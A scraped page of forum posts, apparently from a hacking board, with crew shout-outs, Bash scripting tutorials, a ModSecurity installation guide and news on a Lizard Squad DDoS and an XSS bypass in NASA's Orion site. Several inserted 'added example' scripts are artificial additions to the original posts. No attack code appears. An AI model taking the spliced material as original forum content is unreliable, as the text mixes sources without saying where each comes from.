#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk
#############################################################################################

--==[[Love to]]==--
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Don(Deepika kaushik)

--==[[ Special Fuck goes to ]]==--
<3 suriya Cyber Tyson <3
  13. As far as I know it has nothing to do with the account, nor with the client... many times the problem is on the server side (maintenance work is being done). Ex: two weeks ago, for 48 h, the Jabber accounts on @jabber.ru did not work because maintenance was being done...
  14. First of all, write properly; second, on which Jabber server do you have the account, @jabber.org or another? It may be the Jabber server's fault...
  15. @florinul did you try with the second code and do everything I said?
  16. to be honest I'm not good when it comes to servers so I can't tell, I posted for those who are interested.
  17. Like many other modern high-level programming languages or code interpreters, the Linux shell has the capability to use conditional statements. Often when writing computer code, there's a need to perform different actions based on various logical decisions. For this purpose, it is possible to use conditional statements.

Syntax of if/else statement:

if condition_is_true
then
    execute commands
else
    execute commands
fi

The example below demonstrates a simple if/else statement structure. If the condition is satisfied, the instructions after "then" will be processed, otherwise the code or commands after "else" are executed:

LinuxBox# vi my_script.sh
#!/bin/bash
# Condition check if/else statement
number=5
if [ $number -eq 5 ]; then
    echo "Number is 5 !"
else
    echo "Number is not 5 !"
fi
:wq!
LinuxBox#
LinuxBox# ./my_script.sh
Number is 5 !

We can use a simple if/else statement, for example, in a script that checks if a directory exists:

LinuxBox# vi my_script.sh
#!/bin/bash
# simple if/else directory existence check
directory="./myScripts"
# check if directory exists
if [ -d "$directory" ]; then
    echo "Directory exists !"
else
    echo "Directory does not exist !"
fi
LinuxBox# ./my_script.sh
Directory does not exist !
LinuxBox# mkdir myScripts
LinuxBox# ./my_script.sh
Directory exists !

While structure (loops)

The while construction allows for repetitive execution of code or a list of commands, as long as the command controlling the while loop executes successfully (exit status of zero).

Syntax of while structure:

while condition_is_true
do
    execute these commands
done

This example shows the while syntax. The while loop keeps looping as long as the counter is greater than 0:

LinuxBox# vi my_script.sh
#!/bin/bash
# simple while loop script
COUNT=5
while [ $COUNT -gt 0 ]; do
    echo Value of counter is: $COUNT
    let COUNT=COUNT-1
done
LinuxBox# ./my_script.sh
Value of counter is: 5
Value of counter is: 4
Value of counter is: 3
Value of counter is: 2
Value of counter is: 1

(The loop uses relational operators in the "[ while condition ]" to check for how long the script has to loop. To see more about relational operators check this tutorial.)

This example uses a while loop to get the right user input. Until the user selects the right answer, the script will keep repeating (looping) itself:

LinuxBox# vi my_script.sh
#!/bin/bash
# while loop
# Declare variable choice and assign value 0
choice=0
# Print to stdout
echo "1. Shell"
echo "2. Scripting"
echo "3. ITTutorials"
echo -n "Please enter a choice [1,2 or 3]? "
# Loop while the variable choice is equal 0
while [ $choice -eq 0 ]; do
    # read user input
    read choice
    if [ $choice -eq 1 ]; then
        echo "Your choice is: Bash"
    else
        if [ $choice -eq 2 ]; then
            echo "Your choice is: Scripting"
        else
            if [ $choice -eq 3 ]; then
                echo "Your choice is: ITTutorials"
            else
                # user hasn't entered the right choice so we'll ask the question again
                echo "Please make a choice between 1-3 !"
                echo "1. Bash"
                echo "2. Scripting"
                echo "3. ITTutorials"
                echo -n "Please choose a word [1,2 or 3]? "
                # and reset choice to 0
                choice=0
            fi
        fi
    fi
done
LinuxBox# ./my_script.sh
1. Shell
2. Scripting
3. ITTutorials
Please enter a choice [1,2 or 3]? 3
Your choice is: ITTutorials
LinuxBox#

(Unless the user enters an integer value between 1-3, the script will keep repeating itself.)

Until loop

Like the while loop, the until loop is used for the same purpose of repetitive execution of code. The only difference is that the condition controlling the loop is the opposite. The loop will keep "looping" as long as the condition remains false, or in this case until it reaches the value of the defined counter:

Syntax of until loop:

until [ condition_is_false ]
do
    execute commands
done

LinuxBox# vi my_script.sh
#!/bin/bash
# simple until loop script, will keep looping until counter reaches value of 6
COUNT=0
# bash until loop
until [ $COUNT -gt 5 ]; do
    echo Value of count is: $COUNT
    let COUNT=COUNT+1
done

Select command

The select command is often used for creating interactive terminal menus.

Syntax of select statement:

select varName in list
do
    command1
    command2
    ......
    ......
    commandN
done

Example of a script with an interactive terminal menu using the select statement:

LinuxBox# vi my_script.sh
#!/bin/bash
# select statement
PS3='Choose one word: '
# bash select
select word in "linux" "shell" "scripting" "ittutorials"
do
    echo "The word you have selected is: $word"
    # Break, otherwise we'll have an endless loop
    break
done
exit 0

(PS stands for prompt statement. It is the shell's environment variable, and the default prompt string used by select is "#?". It can be changed by re-defining PS3, so select can display the string stored in PS3 when it is ready to read the user's selection, like in the example.)

Case statement

The shell case statement is similar to the switch statement in C and some other programming languages. It checks the case condition and controls the flow of the program. It can be used to test simple values like integers and characters.

Syntax of case statement:

case expression in
    pattern1)
        execute commands
        ;;
    pattern2)
        execute commands
        ;;
    ....
    patternN)
        execute commands
        ;;
esac

Example script with case statement:

LinuxBox# vi my_script.sh
#!/bin/bash
# simple Case example script
echo "What is your preferred programming / scripting language"
echo "1) bash"
echo "2) php"
echo "3) C++"
echo "4) C"
echo "5) Exit"
read user_choice;
case $user_choice in
    1) echo "You selected bash";;
    2) echo "You selected php";;
    3) echo "You selected C++";;
    4) echo "You selected C";;
    5) exit;;
esac
LinuxBox# ./my_script.sh
What is your preferred programming / scripting language
1) bash
2) php
3) C++
4) C
5) Exit
1
You selected bash

Shell Functions

As in many other programming languages, the usage of functions is also possible in shell scripting. Functions are used to group pieces of code in a more logical way, to enable calling that code anywhere inside the script and using it multiple times. Declaring a function is done by using the "function" keyword with the name of that function. For example, function my_func { my_code }. Inside "{" and "}" goes the code that will be executed every time the function is called. Calling a function is as simple as writing the function's name.

Example of a script that uses functions:

LinuxBox# vi my_script.sh
#!/bin/bash
# script that uses functions
function addition {
    A=3
    B=5
    result=`expr $A + $B`
    echo "$A + $B = $result"
    exit
}
function hello {
    echo "Just saying Hello from function."
}
hello
addition
LinuxBox# ./my_script.sh
Just saying Hello from function.
3 + 5 = 8

Arithmetic Comparison

Using relational operators we can easily compare numeric values. These operators would not work for string values unless their value is numeric. To see more about relational operators check the Linux shell operators tutorial.

Comparing 2 numbers using relational operators:

LinuxBox# vi my_script.sh
#!/bin/bash
# comparing 2 integer numbers
echo "Enter 1st number:"
read first
echo "Enter 2nd number:"
read second
if [ $first -eq $second ]; then
    echo "Both numbers are equal"
elif [ $first -gt $second ]; then
    echo "1st is greater than 2nd number"
else
    echo "2nd is greater than 1st number"
fi
LinuxBox# ./my_script.sh
Enter 1st number:
22
Enter 2nd number:
5
1st is greater than 2nd number

Source
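The menu loop above tests the answer with [ $choice -eq 1 ] straight after read, so anything that is not a whole number makes test complain and the loop misbehaves. The script below is an added example, not part of the original post: it combines a case pattern, a while loop and functions to accept only a number in range, which is the check a script that later feeds that value to other commands should make first.

```shell
#!/bin/sh
# Added example, not from the original post: validate interactive menu input.
# The menu loop in the tutorial tests [ $choice -eq 1 ]; an answer such as
# "abc" makes test fail with "integer expression expected". A case pattern
# checks that the answer is a whole number before any -eq/-ge/-le comparison.

# is_int_in_range VALUE MIN MAX -> exit 0 when VALUE is a whole number in [MIN, MAX]
is_int_in_range() {
    case $1 in
        ''|*[!0-9]*) return 1 ;;   # empty, or contains a non-digit ("abc", "-1", "2x")
    esac
    [ "$1" -ge "$2" ] && [ "$1" -le "$3" ]
}

# read_choice MAX -> keeps asking until the user enters a number from 1 to MAX,
# then prints it. Prompts go to stderr so only the accepted value reaches stdout.
read_choice() {
    max=$1
    while :; do
        printf 'Please enter a choice [1-%s]? ' "$max" >&2
        if ! read -r answer; then       # end of input: give up instead of looping forever
            return 1
        fi
        if is_int_in_range "$answer" 1 "$max"; then
            printf '%s\n' "$answer"
            return 0
        fi
        echo "Please make a choice between 1-$max !" >&2
    done
}

# Interactive demo, skipped when stdin is not a terminal (e.g. under a test runner).
if [ -t 0 ]; then
    echo "1. Shell"
    echo "2. Scripting"
    echo "3. ITTutorials"
    if choice=$(read_choice 3); then
        case $choice in
            1) echo "Your choice is: Shell" ;;
            2) echo "Your choice is: Scripting" ;;
            3) echo "Your choice is: ITTutorials" ;;
        esac
    else
        echo "No valid choice given." >&2
    fi
fi
```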
  18. "Unix shell", "Bash" or "shell" is an interpreter or a command line interface run in a text window mode on Linux or Unix-like machines. It is used to interpret users' commands, process them and forward them to the lower levels of the operating system where they can be executed and perform the desired action. Although there are more shells like Korn shell, Perl shell, zsh, probably the most popular are Csh and Bash. An interpreter or shell also exists on Microsoft Windows; in the past it was the MS-DOS Prompt, now there is the Command Prompt or Windows PowerShell.

When the Linux bash is invoked as an interactive shell, first it reads and executes commands from the /etc/profile file. If /etc/profile doesn't exist, commands from ~/.bash_profile, ~/.bash_login and ~/.profile are executed in the given order. Typically bash_profile executes ~/.bashrc. This file only runs during shell login, and when a login shell exits, Bash reads and executes commands from the ~/.bash_logout file.

Shell scripting

Instead of running a single command, the shell also has the ability to execute multiple commands or an entire set of complex sequences of commands from an external file known as a "shell script" or simply "script". A script might contain just a single command or a large list of commands. It might contain functions, conditional constructs, loops and other logical structures common in programming. Therefore, a Bash shell script is a computer program written in the Bash programming language, and shell scripting is the art of creating and maintaining those scripts. Shell scripting may come from the desire to automate some routine procedure to make things easier for end users, or from a real need to automate many system administration tasks, such as performing disk backups or evaluating system logs.

Writing a Simple Bash Script

A shell script is basically a simple text file with sequences of commands and file permissions set for execution. Once the interpreter "shell" calls a file, the commands in the script are processed and executed. Every shell script starts with the "#!" sequence, often called "shebang". The shebang represents the shell by which the script will be executed. It is an absolute path where the interpreter can be found. So for example if we would like to use the Bourne shell as an interpreter, we can use the sequence #!/bin/sh, or #!/bin/bash:

LinuxBox# vi my_script.sh
#!/bin/bash
# This is my 1st script
echo "Hi, this is hello from shell script !"
:wq!

(Other lines of code in the script that start with the sign "#" are comments. Comments are lines of code that are not processed by the shell. Notice that in comments, "#" signs are not followed by the "!" exclamation mark sign; this is reserved only for the "shebang" syntax. A good practice when writing a script is to make a simple name or explanation and put it in a comment line near the beginning of the script.)

After creating and saving my_script.sh in the VI text editor, we have to change the file's permissions to make it executable. To make a script executable we can set permissions to something like 700 or similar:

LinuxBox# chmod 700 my_script.sh
LinuxBox# ls -l
-rwx------ 1 root root 29 Apr 29 13:07 my_script.sh

After we have set executable permissions, the script can be called and start doing its job:

LinuxBox# ./my_script.sh
Hi, this is hello from shell script !
LinuxBox#

Once we know the basics, we can make some scripts and use commands that actually do something useful. For example, if we want to make a simple backup script which syncs our data, we could write a script like this:

LinuxBox# vi my_backup.sh
#!/bin/bash
# my simple backup script that uses rsync and tar
tar -czf /home/ittutorials/Documents/my_pictures.tar.gz /home/ittutorials/Pictures
rsync -avh --exclude="*.bak" /home/ittutorials/Documents/ /media/sdb/my_backup/
LinuxBox#

(The script could be called every day via a cron job. That way we could have an automatic backup procedure. See the CronJob tutorial for more info on task scheduling and automation.)

Use of Variables

Simple batch jobs might be useful for isolated tasks, but the use of variables provides much more flexibility. Although the above script is useful, it has hard-coded paths. That might not be a problem, but when writing long scripts that reference paths often, a better idea would be to utilize variables. That way we can put long path names into "memory boxes" (variables), and call them from variables whenever we want:

LinuxBox# vi my_backup.sh
#!/bin/bash
# my simple backup script that uses variables and rsync
SOURCEDIR=/home/ittutorials/Documents/MyPictures
DESTDIR=/media/sdb/userdata/my_backup/
echo "Starting backup..."
echo "Backing up" $SOURCEDIR
rsync -avh --exclude="*.bak" $SOURCEDIR $DESTDIR
echo "Backing up to destination" $DESTDIR
echo "Backup is successful !"
LinuxBox#

(This way, if we change the variable for a directory path in only one location, the change will take effect for the whole script wherever this variable is used, which makes maintenance of scripts a lot easier.)

Global vs. Local variables

Global variables can be used anywhere in the bash script. Once the global variable is defined and its value is set, it can be used in functions, loops and any other logical structure inside the script in which it is defined. Local variables are defined and used only inside functions. Their life is limited to the specific function in which they are defined, and their value can't be used outside that function. This is often called the scope of a variable. Local variables are defined with the reserved word "local" used in front of the variable name:

LinuxBox# vi use_of_variables.sh
#!/bin/bash
# Local vs. Global variables
VAR="Global variable"
function my_function {
    # This variable is local to my_function function
    local VAR="Local variable"
    echo $VAR
}
echo $VAR
my_function
echo $VAR
# Notice that global variable did not change
# "local" is shell reserved word for local variables
LinuxBox# ./use_of_variables.sh
Global variable
Local variable
Global variable
LinuxBox#

(Notice that even though the global and local variable have the same name "$VAR", the value of the global variable did not change once we defined and called the local variable from the function.)

Environment variables

Environment variables are a set of dynamic named values that can affect the way running processes will behave. For example, an environment variable with a standard name can store the location that a particular computer system uses to store temporary files. Some common and often used environment variables are:

PATH - Sets the search path for any executable command. Similar to the PATH variable in MSDOS.
HOME - Home directory of the user.
MAIL - Contains the path to the location where mail addressed to the user is stored.
PS1 - Primary prompt in bash. PS1 is set to $ by default.
PS2 - Secondary prompt in bash. PS2 is set to '>' by default.
USER - User login name.
HOSTNAME - The system's host name.
MACHTYPE - The CPU architecture that the system is running on.
TERM - Indicates the terminal type being used. This should be set correctly for editors like vi to work correctly.
SHELL - Determines the type of shell that the user sees on logging in.

To see what the values of the above environment variables are, just do an echo of the name of the variable preceded with a $. For example, to determine the type of shell enter:

LinuxBox# echo $SHELL
/bin/bash
LinuxBox#

To see all environment variables and their values under UNIX-like operating systems, use the set or printenv command:

LinuxBox# set
BASH=/bin/bash
BASHOPTS=checkwinsize:cmdhist:expand_aliases:extquote:force_fignore:histappend:hostcomplete:interactive_comments:login_shell:progcomp:promptvars:sourcepath
BASH_ALIASES=()
BASH_SOURCE=()
BASH_VERSINFO=([0]="4" [1]="1" [2]="5" [3]="1" [4]="release" [5]="i486-pc-linux-gnu")
BASH_VERSION='4.1.5(1)-release'
COLUMNS=80
DIRSTACK=()
EUID=0
GROUPS=()
HISTCONTROL=ignoreboth
HISTFILE=/root/.bash_history
HISTFILESIZE=500
HISTSIZE=500
HOME=/root
HOSTNAME=ittutorials
HOSTTYPE=i486
IFS=$' \t\n'
LINES=24
LOGNAME=root
...
LinuxBox#

To set an environment variable in the Bourne shell (sh and bash), simply use the "export" command with the name and value of the environment variable (export var=value):

LinuxBox# export PATH=/home/JohnnyBoy/bin
LinuxBox#

Or, to add a folder to the current PATH without overwriting the current path:

LinuxBox# export PATH=$PATH:/home/JohnnyBoy/bin
LinuxBox#

(Changing an env variable like PATH will enable you to run a script located in the folder you have just added to the path, without providing the full path of the script. After the change, scripts will be able to run from anywhere in the system path by simply calling the name of the script.)

Reading user's input

Non-interactive scripts are useful, but we have to provide new information from the start when the script gets initiated. A better way is to make an interactive script that can catch the user's input as the script's arguments while the script is running. Catching the user's input is usually done from the command line interface during the script's run-time. To read user input and put the value in a variable of a script, we'll use the "read" syntax:

LinuxBox# vi my_script.sh
#!/bin/bash
# Reading of user's input
echo "Please enter your name: "
read user_name
echo "Nice to meet you $user_name"
echo "Can you please enter your 2 favorite colors? "
read color1 color2
echo "Your favorite colors are $color1 and $color2."
LinuxBox# ./my_script.sh
Please enter your name:
John
Nice to meet you John
Can you please enter your 2 favorite colors?
Black White
Your favorite colors are Black and White.
LinuxBox#

Or we could simply use the "$" sign with the number of the argument we want to catch. So if we would like to catch the 1st argument we can use $1 as in the example below:

LinuxBox# vi my_script.sh
#!/bin/bash
# Reading and displaying of arguments
echo "You just entered the words: $1 $2"
LinuxBox# ./my_script.sh John Malkovich
You just entered the words: John Malkovich
LinuxBox#

(Notice that catching data this way doesn't wait for the user's input. We have to provide input along with the script name, as in the example above, where the input is "John Malkovich".)

Source
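The PATH change shown above ("export PATH=$PATH:/home/JohnnyBoy/bin") is exactly the kind of variable edit worth checking before it is made permanent: every directory in PATH is a place from which a bare command name will be run. The script below is an added example, not part of the original post; it walks a PATH-style string with the same variable and loop constructs the tutorial uses and reports entries a careful administrator would question.

```shell
#!/bin/sh
# Added example, not from the original post: audit the entries of a PATH-style
# string before exporting it. After "export PATH=$PATH:/home/JohnnyBoy/bin" any
# program placed in that directory runs by its bare name, so an entry that is
# empty (it means "the current directory"), relative, missing, or writable by
# other users deserves a second look.

# audit_path PATH_STRING
# Prints one "PROBLEM<TAB>entry" line per questionable entry.
# Returns 0 when every entry is acceptable, 1 otherwise.
audit_path() {
    rest="$1:"              # trailing ':' lets the loop consume the last entry too
    status=0
    while [ -n "$rest" ]; do
        entry=${rest%%:*}   # text before the first ':'
        rest=${rest#*:}     # everything after it
        case $entry in
            '')
                printf 'EMPTY_ENTRY\t(current directory)\n'; status=1; continue ;;
            /*)
                ;;          # absolute path: checked below
            *)
                printf 'RELATIVE\t%s\n' "$entry"; status=1; continue ;;
        esac
        if [ ! -d "$entry" ]; then
            printf 'MISSING\t%s\n' "$entry"; status=1; continue
        fi
        # -perm -0002: the directory itself is writable by "others" (e.g. mode 777).
        # -prune keeps find from descending into it.
        if [ -n "$(find "$entry" -prune -perm -0002 2>/dev/null)" ]; then
            printf 'WORLD_WRITABLE\t%s\n' "$entry"; status=1
        fi
    done
    return $status
}

# Demo on the current environment
if audit_path "$PATH"; then
    echo "PATH looks clean."
fi
```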
  19. In computer programming, an operator is a symbol or function representing a mathematical operation. Common examples are mathematical arithmetic operations, e.g. ">" for "greater than", or "<" for "less than". Programming languages typically support a set of built-in operators (e.g. +, -, *). As in programming languages, there are various operators supported by each Unix shell.

Bourne shell operators:

- Arithmetic Operators
- Relational Operators
- Boolean Operators
- String Operators
- File Test Operators

One thing to notice is that the Bourne shell originally didn't have any mechanism to perform simple arithmetic, but uses external programs. A common example of performing arithmetic is done by using the simple "expr" program. Simple example of summation of two numbers:

LinuxBox# vi my_script.sh
#!/bin/sh
# summation of 2 numbers
val=`expr 3 + 2`
echo "Total value: $val !"
LinuxBox#
LinuxBox# ./my_script.sh
Total value: 5 !

(Also notice that there must be spaces between operators and expressions; for example "2+2" is not correct, whereas it should be written as "2 + 2". Also, the completed expression should be enclosed between `` signs, called inverted commas.)

Arithmetic Operators:

+ Addition - Adds values on either side of the operator
- Subtraction - Subtracts right hand operand from left hand operand
* Multiplication - Multiplies values on either side of the operator
/ Division - Divides left hand operand by right hand operand
% Modulus - Divides left hand operand by right hand operand and returns remainder
= Assignment - Assigns right operand to left operand
== Equality - Compares two numbers, if both are the same then returns true
!= Not Equality - Compares two numbers, if both are different then returns true

An important thing to note here is that all the conditional expressions should be put inside square brackets with one space around them. For example [ $a == $b ] is correct whereas [$a==$b] is incorrect.

Relational Operators:

Relational operators are specific to numeric values. These operators would not work for string values unless their value is numeric. For example, operators would work to check a relation between 5 and 10 as well as between "5" and "10" but not between "five" and "ten".

-eq - Checks if the values of two operands are equal or not
-ne - Checks if the values of two operands are not equal
-gt - Checks if the value of the left operand is greater than the value of the right operand
-lt - Checks if the value of the left operand is less than the value of the right operand
-ge - Checks if the value of the left operand is greater than or equal to the value of the right operand
-le - Checks if the value of the left operand is less than or equal to the value of the right operand

An important thing to note here is that all the conditional expressions should be put inside square brackets with one space around them. For example [ $A -le $B ] is correct whereas [$A -le $B] is not correct.

Boolean Operators

Boolean algebra is the subarea of algebra in which the values of the variables are the truth values true and false. For example, the boolean operator for logical negation "!" could be combined with the relational operator which checks equality, which would in the end make them check for "NOT equality".

! - This is logical negation. This inverts a true condition into false and vice versa
-o - This is logical OR. If one of the operands is true then the condition would be true
-a - This is logical AND. If both the operands are true then the condition would be true, otherwise it would be false

String Operators

String operators are operators intended for use with variables that hold string values.

= Checks if the values of two operands are equal or not, if yes then the condition becomes true
!= Checks if the values of two operands are equal or not, if the values are not equal then the condition becomes true
-z Checks if the given string operand size is zero. If it is zero length then it returns true
-n Checks if the given string operand size is non-zero. If it is non-zero length then it returns true
str Checks if str is not the empty string. If it is empty then it returns false

File Test Operators

File test operators are operators to test various properties associated with Unix files. It is assumed that the variable "file" holds a file name (full path to a specific file).

-b file Checks if file is a block special file; if yes then the condition becomes true
-c file Checks if file is a character special file; if yes then the condition becomes true
-d file Checks if file is a directory; if yes then the condition becomes true
-f file Checks if file is an ordinary file as opposed to a directory or special file; if yes then the condition becomes true
-g file Checks if file has its set group ID (SGID) bit set; if yes then the condition becomes true
-k file Checks if file has its sticky bit set; if yes then the condition becomes true
-p file Checks if file is a named pipe; if yes then the condition becomes true
-t file Checks if file descriptor is open and associated with a terminal; if yes then the condition becomes true
-u file Checks if file has its set user ID (SUID) bit set; if yes then the condition becomes true
-r file Checks if file is readable; if yes then the condition becomes true
-w file Checks if file is writable; if yes then the condition becomes true
-x file Checks if file is executable; if yes then the condition becomes true
-s file Checks if file has size greater than 0; if yes then the condition becomes true
-e file Checks if file exists. Is true even if file is a directory but exists

Next, see the Shell scripting tutorial and examples of usage of shell operators.

Source
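The file test operators in the table are what a quick permissions check is built from, and the SUID/SGID tests in particular matter far more than their one-line descriptions suggest. The function below is an added example, not part of the original post; it applies the string, boolean and file test operators listed above to describe a path, and the sample files in its usage are constructed.

```shell
#!/bin/sh
# Added example, not from the original post: apply the file test, string and
# boolean operators from the table above to describe a file the way a quick
# permissions audit would. Sample files used to try it out are constructed.

# describe_file PATH
# Prints a space-separated list of properties, e.g. "regular readable setuid".
# Returns 1 when PATH is empty (-z) or does not exist (! -e).
describe_file() {
    f=$1
    if [ -z "$f" ] || [ ! -e "$f" ]; then
        return 1
    fi
    if   [ -d "$f" ]; then props="directory"
    elif [ -f "$f" ]; then props="regular"
    elif [ -p "$f" ]; then props="pipe"
    elif [ -b "$f" ] || [ -c "$f" ]; then props="device"
    else props="other"
    fi
    [ -r "$f" ] && props="$props readable"
    [ -w "$f" ] && props="$props writable"
    [ -x "$f" ] && props="$props executable"
    [ -s "$f" ] || props="$props empty"
    # -a (logical AND) with -u: a regular file carrying the SUID bit is the
    # combination a permissions audit cares about most.
    [ -f "$f" -a -u "$f" ] && props="$props setuid"
    [ -g "$f" ] && props="$props setgid"
    [ -k "$f" ] && props="$props sticky"
    printf '%s\n' "$props"
}

# Usage: ./describe.sh FILE...   (one line per argument)
for target in "$@"; do
    if desc=$(describe_file "$target"); then
        printf '%s: %s\n' "$target" "$desc"
    else
        printf '%s: missing\n' "$target"
    fi
done
```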
  20. ModSecurity

ModSecurity is an Open Source Web Application project (Apache module) that aims to secure web applications running on webservers and block penetration or hacking attempts by investigating the body of HTTP requests. It provides intrusion detection and prevention for web applications and aims at shielding web applications from attacks like SQL injection, cross-site scripting and path traversal attacks...

About Apache modules

The Apache WebServer is a modular application where the user can choose the functionality to include in the server by selecting the desired modules. Modules can be either statically compiled into the httpd binary when the server is built or compiled as Dynamic Shared Objects (DSOs) separately from the main httpd binary file. DSO modules may be compiled at the time the server is built, or they may be compiled and added at a later time using the Apache Extension Tool (apxs). After a module is compiled into a DSO, it will have an extension like mod.so.

Installing mod-security

Mod-security can be installed with the apt-get manager on Debian; on a Fedora system Yum can be used.

First, we'll update the apt-get source database:

LinuxBox# apt-get update
Ign http://ftp.de.debian.org lenny Release.gpg
Ign http://ftp.de.debian.org/debian/ lenny/main Translation-en
Hit http://security.debian.org squeeze/updates Release.gpg
Ign http://security.debian.org/ squeeze/updates/contrib Translation-en
Ign http://security.debian.org/ squeeze/updates/contrib Translation-en_US
Ign http://ftp.de.debian.org/debian/ lenny/main Translation-en_US
Hit http://ftp.de.debian.org squeeze Release.gpg
Ign http://ftp.de.debian.org/debian/ squeeze/main Translation-en
Ign http://ftp.de.debian.org/debian/ squeeze/main Translation-en_US
Ign http://ftp.de.debian.org lenny Release
Ign http://security.debian.org/ squeeze/updates/main Translation-en
Ign http://security.debian.org/ squeeze/updates/main Translation-en_US
Hit http://security.debian.org squeeze/updates Release
Hit http://ftp.de.debian.org squeeze Release
...

After updating the source list, we can install mod-security:

LinuxBox# apt-get install libapache-mod-security
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following extra packages will be installed:
  liblua5.1-0 mod-security-common
The following NEW packages will be installed:
  libapache-mod-security liblua5.1-0 mod-security-common
0 upgraded, 3 newly installed, 0 to remove and 73 not upgraded.
Need to get 1,158 kB of archives.
After this operation, 3,490 kB of additional disk space will be used.
Do you want to continue [Y/n]?
...
Setting up libapache-mod-security (2.5.12-1) ...
Reloading web server config: apache2.

In /etc/apache2/mods-available/ we can find the available Apache modules, including mod-security:

LinuxBox# ls /etc/apache2/mods-available/ | grep mod
mod-security.load
LinuxBox#

(In /etc/apache2/mods-enabled are located symlinks to the modules which are enabled.)

Enabling or disabling Apache modules

Once an Apache module is installed we can enable it with a2enmod, or disable it with the a2dismod command, after which we have to restart the Apache server with the "/etc/init.d/apache2 restart" command:

LinuxBox# a2dismod mod-security && /etc/init.d/apache2 restart
Module mod-security disabled.
Run '/etc/init.d/apache2 restart' to activate new configuration!
Restarting web server: apache2 ... waiting .
LinuxBox# a2enmod mod-security && /etc/init.d/apache2 restart
Enabling module mod-security.
Run '/etc/init.d/apache2 restart' to activate new configuration!
Restarting web server: apache2 ... waiting .

Check loaded modules

To check and see the loaded modules (the modules which are enabled), apachectl -M can be used:

LinuxBox# apachectl -M
Loaded Modules:
 core_module (static)
 log_config_module (static)
 logio_module (static)
 mpm_prefork_module (static)
 http_module (static)
 so_module (static)
 alias_module (shared)
 auth_basic_module (shared)
 authn_file_module (shared)
 authz_default_module (shared)
 authz_groupfile_module (shared)
 authz_host_module (shared)
 authz_user_module (shared)
 autoindex_module (shared)
 cgi_module (shared)
 deflate_module (shared)
 dir_module (shared)
 env_module (shared)
 mime_module (shared)
 security2_module (shared)
 negotiation_module (shared)
 perl_module (shared)
 php5_module (shared)
 python_module (shared)
 reqtimeout_module (shared)
 setenvif_module (shared)
 status_module (shared)
 unique_id_module (shared)
Syntax OK
LinuxBox#

Source
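A small check that follows the last step of the post (verifying with apachectl -M that mod-security is really loaded), written as an added example that is not part of the original post: it parses a listing in the format apachectl -M prints and reports which ModSecurity prerequisites are missing. The listing, the module name security2_module and the dependency on unique_id_module come from the post and ModSecurity's own requirements; the function names are this example's.

```python
"""Added example (not from the post): check that the Apache modules ModSecurity
needs are loaded, by parsing the output format of `apachectl -M`."""
import re
import subprocess

# Constructed listing in the shape `apachectl -M` prints, as in the post.
SAMPLE_LISTING = """Loaded Modules:
 core_module (static)
 so_module (static)
 unique_id_module (shared)
 security2_module (shared)
Syntax OK
"""

# security2_module is ModSecurity 2.x itself (Debian calls the package
# mod-security, but the module registers as security2_module);
# unique_id_module supplies the per-request id that the audit log relies on.
REQUIRED_MODULES = ("security2_module", "unique_id_module")

_LINE = re.compile(r"^\s*(\w+_module)\s+\((static|shared)\)\s*$")


def parse_modules(listing: str) -> dict:
    """Map module name -> 'static' or 'shared' from an `apachectl -M` listing."""
    modules = {}
    for line in listing.splitlines():
        m = _LINE.match(line)
        if m:
            modules[m.group(1)] = m.group(2)
    return modules


def missing_modules(listing: str, required=REQUIRED_MODULES) -> list:
    """Return the required modules that are not loaded, in the order given."""
    loaded = parse_modules(listing)
    return [name for name in required if name not in loaded]


def check_live_server() -> list:
    """Run the same check against the running server (needs apachectl on PATH).
    Some Apache versions print the module list on stderr, so both are read."""
    proc = subprocess.run(["apachectl", "-M"], capture_output=True, text=True,
                          check=False)
    return missing_modules(proc.stdout + proc.stderr)


if __name__ == "__main__":
    gaps = missing_modules(SAMPLE_LISTING)
    print("all ModSecurity prerequisites loaded" if not gaps
          else "missing: " + ", ".join(gaps))
```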
  21. A hacker group has claimed responsibility for attacking Sony's online PlayStation store, which is down on Monday. Visitors to the site are greeted with a message that says "Page Not Found! It's not you. It's the internet's fault". A group called "Lizard Squad" has taken credit for the outage, posting "PSN Login #offline #LizardSquad" as their Twitter status. The outage is the most recent in a series of attacks on tech giant Sony. The Japanese firm's Hollywood film studios' corporate network was hacked into last month, followed by an online leak of unreleased movies, along with confidential information such as actors' salaries. Sony Entertainment Network has responded by tweeting that they are aware of the issues that users are having in connecting to the PlayStation network. "Thanks for your patience as we investigate," the company tweeted at about midnight GMT. The disruption comes just days after the gaming console celebrated its 20th anniversary last week. Lizard Squad attacks Meanwhile, the outage on the PlayStation network follows one on Microsoft Xbox network, which was down for at least a day last week. Lizard Squad also claimed it was behind the attack. The Xbox network was hit with a DDOS, or a distributed denial of service attack, which overloaded the system, stopping users from getting online. The hacker group had then said that its Xbox attack was just "a small dose" of what was to come over the Christmas season. Lizard Squad has claimed responsibility for attacks that have taken high-profile targets like EA games and Destiny offline in the past. Known as Lizard Patrol on Twitter, the anonymous collective has a Russian-based website. Source
  22. One of the 1.3 million names sent into space aboard NASA's Orion test capsule was a stowaway, uploaded to NASA's database by a security researcher who found and exploited a vulnerability. The name 'Payload1 Payload2' was one of three uploaded to the NASA Orion database that collected names to be later transferred to a chip aboard the rocket and shot into space. The hack, since closed, was not malicious nor dangerous to the mission but rather a flexing of grey matter by bug hunter Benjamin Kunz Mejri. "Two IDs were observed by the NASA team and one passed through the procedure of verification and validation," Mejri wrote in an advisory. "To ensure the ticket was closed NASA included an image that shows the user in the official NASA 'no fly list'. "The high severity vulnerability allows remote attackers to inject own system specific codes to the application-side of the affected NASA online-service website." The filter bypass and persistent input validation web vulnerability was related to the first and surname fields of the Orion boarding pass module. It let remote attackers inject scripts to compromise NASA's embed boarding pass module. "After saving the malicious context to a boarding pass service the attacker can use the embed module to stream malicious codes as embed code execution through the boarding pass application of the NASA Mars program website," he said. Mejri reported the flaw and his exploits to NASA, which promptly banned two of the three identities uploaded, allegedly missing one. The two known identities were stamped with a 'no fly list' while the third remains known only to Mejri. Names were written to a chip using e-beam lithography and subsequently flashed to a second chip which went into space. NASA said the chip was not vulnerable since it was isolated and lacked executable code. The ship landed safely in the Pacific Ocean Saturday a mile and a half off-target. 
Mejri's payload spent four hours and 24 minutes in two elliptical orbits of Earth, with an apogee of 5800 kilometres. Source
